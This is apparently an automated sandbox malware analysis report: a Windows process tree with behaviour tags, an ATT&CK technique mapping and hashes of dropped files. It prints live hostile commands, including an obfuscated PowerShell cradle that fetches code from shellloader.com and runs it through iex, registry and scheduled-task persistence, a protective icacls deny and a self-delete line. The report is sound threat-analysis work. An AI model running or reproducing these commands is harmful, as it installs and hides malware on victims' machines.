                                                                                                                                                                                      cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6184
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          PID:6596
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\K53z2O0aa.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\K53z2O0aa.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4920
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:7164
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:6780
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:6444
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:4608
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:5128
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EsWdMD6En.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\EsWdMD6En.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:7248
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1652
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:1016
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:1264
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:2316
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:4616
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5140
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:6708
                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  PID:6816
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:6868
                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:6384
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 6123C290D672EE5B74538F4BDC627F28 C
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5420
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 932992A5A8E2CC33B6768EAF73747687
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:7900
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:8132
                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 9A74F60D0D0F75FA6EEE3DC3183D0B75 E Global\MSI0000
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5108
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  PID:6888
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:7892
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:7908
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4041.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\4041.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:7328
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4041.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4041.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                    PID:5212
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls "C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:3128
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4041.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4041.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:2728
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4041.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\4041.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Modifies extensions of user files
                                                                                                                                                                                        PID:7656
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build2.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build2.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:7088
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build2.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build2.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                            PID:6424
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:6588
                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                  taskkill /im build2.exe /f
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:3004
                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                  PID:5204
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build3.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build3.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:7600
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build3.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\05e64923-09d0-4be6-86f3-9c8d1eefb797\build3.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5128
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:7200
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:6428
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\90E3.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\90E3.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:6180
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BA84.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\BA84.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:7360
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5876
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Modifies system executable filetype association
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:6212
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:7292
                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                        PID:6788
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:4052
                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                        PID:8132
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:7568
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        PID:5004
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:7328
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          PID:5240
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4280
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:4648
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:6852
                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:7624
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                PID:4128
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  PID:6968
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1664
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    PID:5920
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5156
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      PID:3684
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:6620

                                                                                                                                                                                                      Network

                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                      Execution

                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1053

                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                      Change Default File Association

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1042

                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                      2
                                                                                                                                                                                                      T1060

                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1053

                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1053

                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                      4
                                                                                                                                                                                                      T1112

                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1497

                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1222

                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1130

                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                      3
                                                                                                                                                                                                      T1081

                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1518

                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                      7
                                                                                                                                                                                                      T1012

                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1497

                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                      7
                                                                                                                                                                                                      T1082

                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                      2
                                                                                                                                                                                                      T1120

                                                                                                                                                                                                      Collection

                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                      3
                                                                                                                                                                                                      T1005

                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                      1
                                                                                                                                                                                                      T1102

                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        f135dce6c8a88731a01efcce9a81478d

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        f2ef2e5833296c6ce5c0ba280361ea3b9348c65a

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        cf6cfb85d2405b8bb6afedab990009b9d67b92a30be3843f9e76706bbbd7a16f

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        c8040f7aacaa779c5475c81c0d39cafda4a5ed6767c9ac9311c7febbe22c8c40a1452355e8b17844535f36d718b457922edb9b171c5f555424545a9ccb3c1ad6

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        f135dce6c8a88731a01efcce9a81478d

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        f2ef2e5833296c6ce5c0ba280361ea3b9348c65a

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        cf6cfb85d2405b8bb6afedab990009b9d67b92a30be3843f9e76706bbbd7a16f

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        c8040f7aacaa779c5475c81c0d39cafda4a5ed6767c9ac9311c7febbe22c8c40a1452355e8b17844535f36d718b457922edb9b171c5f555424545a9ccb3c1ad6

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        e511bb4cf31a2307b6f3445a869bcf31

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        76f5c6e8df733ac13d205d426831ed7672a05349

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri1544861ac3fe6a.exe
                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        eeeb478e6db34388e571c5564cc4714a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        4b774443e5a1dd712559b8aa079c039b213077ee

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        ef0cb785c6b8670e941e791341b692a60f32ca96bbe91ebfd615970ac1165403

